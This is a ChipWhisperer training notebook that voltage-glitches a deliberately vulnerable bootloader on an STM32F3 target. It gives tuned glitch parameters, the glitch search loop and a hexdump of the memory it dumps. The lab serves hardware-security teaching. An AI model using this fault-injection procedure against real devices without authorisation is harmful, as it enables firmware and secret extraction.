# Part 2, Topic 3: Voltage Glitching to Dump Memory (MAIN)

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous labs, we learned how voltage glitching can be used for a similar function as clock glitching. We also learned about how it has fewer limitations, but can be less reliable for certain target setups. It also changes a great deal based on the properties of the glitch circuit itself - even changing a wire can have a huge effect.*

*In this lab, we'll use what we learned in the last lab to again attack the vulnerable serial printing of the bootloader*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching
* Understanding how compiler optimizations can cause devices to behave in strange ways

## The Situation

You should already know the situation from your previous attempts at glitching this bootloader (as well as what the flaw is). No need to do big long searches for parameters to try glitching at the beginning of the loop, just use values that worked well for the previous tutorial.

Be careful that you don't accidentally put the spot we're trying to glitch outside of `glitch_spots` - if you used a repeat > 1, the actual spot being glitched might be at the end or in the middle of the repeat!

Like with the clock glitching version of this lab, we'll be using SimpleSerial V2 to speed up glitching

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F3'
SS_VER='SS_VER_2_1'

In [2]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE -j SS_VER=$2

SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
make[1]: '.dep' is up to date.
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
.
Welcome to another exciting ChipWhisperer target build!!
arm-none-eabi-gcc (15:10.3-2021.07-4) 10.3.1 20210621 (release)
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Assembling: .././hal/stm32f3/stm32f3_startup.S
arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -DF_CPU=7372800 -Wa,-gstabs,-adhlns=objdir-CW308_STM32F3/stm32f3_startup.lst -I.././simpleserial/ -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ .././hal/stm32f3/stm32f3_startup.S -o obj

In [3]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

INFO: Found ChipWhisperer😍
scope.gain.mode                          changed from low                       to high                     
scope.gain.gain                          changed from 0                         to 30                       
scope.gain.db                            changed from 5.5                       to 24.8359375               
scope.adc.basic_mode                     changed from low                       to rising_edge              
scope.adc.samples                        changed from 24400                     to 5000                     
scope.adc.trig_count                     changed from 3432465309                to 3435380348               
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 18402397                  to 96000000                 
scope.clock.adc_rate                     changed from 18402397.0                to 96000000.0        

In [4]:
fw_path = "../../../hardware/victims/firmware/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [5]:
cw.program_target(scope, prog, fw_path)

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 4747 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 4747 bytes


Again, we're going to use a higher frequency on non-Husky ChipWhisperers. We'll also use the trigger length to get our `ext_offset` range:

In [6]:
scope.clock.adc_src = "clkgen_x1"
def reboot_flush():            
    reset_target(scope)
    #Flush garbage too
    target.flush()
    
scope.clock.adc_src = "clkgen_x1"
reboot_flush()
scope.adc.samples = 24000

if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*32/7.37
    else:
        target.baud = 38400*32/7.37
elif (PLATFORM == "CWLITEARM") or ("F3" in PLATFORM):
    scope.clock.clkgen_freq = 24E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*24/7.37
    else:
        target.baud = 38400*24/7.37

reboot_flush()
scope.arm()
target.write("p516261276720736265747267206762206f686c207a76797821\n")
ret = scope.capture()
        
trig_count = scope.adc.trig_count

print(trig_count)
cw.plot(scope.get_last_trace())

4229


:Curve   [x]   (y)

Like with the clock version of this lab, you'll want to inspect the power trace and glitch near the beginning and end of the loop.

In [7]:
glitch_spots = [i for i in range(1)]

glitch_spots = list(range(trig_count - 2000, trig_count, 1))
if SS_VER == "SS_VER_2_1":
    glitch_spots = list(range(0, trig_count, 1))
elif PLATFORM == "CW308_SAM4S":
    glitch_spots = list(range(trig_count - 2300, trig_count-1800, 1))
elif PLATFORM == "CWLITEXMEGA":
    glitch_spots = list(range(9500, 9650, 1))

In [8]:
if scope._is_husky:
    scope.vglitch_setup('hp', default_setup=False)
else:
    scope.vglitch_setup('both', default_setup=False) # use both transistors

def my_print(text):
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n": 
            print(ch, end='')
        else:
            print("0x{:02X}".format(ord(ch)), end='')
        print("", end='')

In [9]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset", "tries"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

FloatSlider(value=0.0, continuous_update=False, description='tries setting:', disabled=True, max=10.0, readout…

In [10]:
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None}, x_index="width", y_index="ext_offset")

:DynamicMap   []
   :Overlay
      .Points.I  :Points   [width,ext_offset]
      .Points.II :Points   [width,ext_offset]

Now the rest is up to you! 

In [11]:
if scope._is_husky:
    gc.set_range("width", 1850, 1901)
    gc.set_range("offset", 2000, 2300)
    gc.set_global_step([50])
else:
    gc.set_global_step(0.4)
    if PLATFORM == "CWLITEXMEGA":
        gc.set_range("width", 46, 49.8)
        gc.set_range("offset", -46, -49.8)
        scope.glitch.repeat = 11
    elif PLATFORM == "CW308_STM32F4":
        gc.set_range("width", 0.4, 10)
        gc.set_range("offset", 40, 49.8)
        scope.glitch.repeat = 5
    elif PLATFORM == "CW308_STM32F3":
        gc.set_range("width", 43.6, 46.4)
        gc.set_range("offset", -35, -15)
        scope.glitch.repeat = 5

gc.set_range("tries", 1, 1) # change this if you want to glitch each spot multiple times
gc.set_range("ext_offset", glitch_spots[0], glitch_spots[-1])
gc.set_step("ext_offset", glitch_spots[1] - glitch_spots[0])
gc.set_step("tries", 1)

In [12]:
import hexdump

reboot_flush()
#disable logging
cw.set_all_log_levels(cw.logging.CRITICAL)
scope.adc.timeout = 0.2

broken = False
dump = bytearray()
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    if broken:
        break
    scope.glitch.ext_offset = glitch_setting[2]
    if scope.adc.state:
        #print("Timeout, trigger still high!")
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    target.flush()
    scope.arm()
    target.write("p516261276720736265747267206762206f686c207a76797821\n")
    ret = scope.capture()
    if ret:
        #print('Timeout - no trigger')
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    else:
        time.sleep(0.05)
        output = target.read(timeout=2)
        if "767" in output:
            print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(scope.glitch.ext_offset, scope.glitch.offset, scope.glitch.width))
            gc.add("success")
            broken = True 
            for __ in range(500):
                num_char = target.in_waiting()
                if num_char:
                    bs = output.encode('utf-8')
                    dump.extend(bs)
                    output = target.read(timeout=50)
            time.sleep(1)
            hexdump.hexdump(dump)
            break
        else:
            gc.add("normal")
                
#reenable logging
cw.set_all_log_levels(cw.logging.WARNING)

Glitched!
	Ext offset: 1566
	Offset: -35.15625
	Width: 43.75
00000000: 72 30 0A 0A 0A 0A 0A 0A  36 37 32 30 37 33 36 32  r0......67207362
00000010: 36 35 37 34 37 32 36 37  32 30 36 37 36 32 32 30  6574726720676220
00000020: 36 66 36 38 36 63 32 30  37 61 37 36 37 39 37 38  6f686c207a767978
00000030: 32 31 00 00 00 00 00 00  00 00 00 00 00 00 00 00  21..............
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 00 38 01 40 00 C2 84 03  00 00 00 00 00 00 00 00  .8.@............
00000060: 00 00 00 00 00 0C 00 00  00 00 00 00 00 00 00 00  ................
00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000A0: 00 01 00 00 00 00 00 00  00 01 00 00 00 C3 BF 00  ................
000000B0: 00 00 00 00 00 00 00 00  00 00 00 20 20 00 00 00  ...........  ...
000000C0: 00 00

In [13]:
scope.dis()
target.dis()